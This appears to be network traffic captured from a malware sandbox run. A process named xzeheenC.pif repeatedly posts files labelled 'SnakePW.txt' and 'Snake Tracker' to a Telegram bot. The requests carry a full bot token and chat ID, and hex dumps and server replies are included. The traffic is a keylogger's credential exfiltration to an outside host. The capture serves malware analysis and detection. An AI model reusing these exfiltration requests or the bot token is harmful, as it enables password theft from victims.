                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:18 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419046,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535878,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.849728149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:19 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f7fdbb5edd9
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:19 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 37 66 64 62 62 35 65 64 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f7fdbb5edd9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:19 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:19 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:19 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419048,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535879,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.849729149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:20 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2013e4ac1c7c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:20 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 31 33 65 34 61 63 31 63 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2013e4ac1c7cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:20 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:20 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:20 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419050,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535880,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.849730149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:21 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f98ce0b208f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:21 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 39 38 63 65 30 62 32 30 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f98ce0b208fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:21 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:21 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:21 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419052,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535881,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.849731149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:21 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f4f20e7a29d
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:21 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 66 32 30 65 37 61 32 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f4f20e7a29dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:22 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:21 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:22 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419054,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535881,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.849732149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:21 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20298b3b9c53
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:21 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 32 39 38 62 33 62 39 63 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20298b3b9c53Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:22 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:22 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:22 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419056,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535882,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.849733149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:23 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fb1ab45af37
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:23 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 62 31 61 62 34 35 61 66 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1fb1ab45af37Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:23 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:23 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:23 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 38 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419058,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535883,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.849734149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:23 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f6572db528e
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:23 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 36 35 37 32 64 62 35 32 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd1f6572db528eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:23 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:23 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
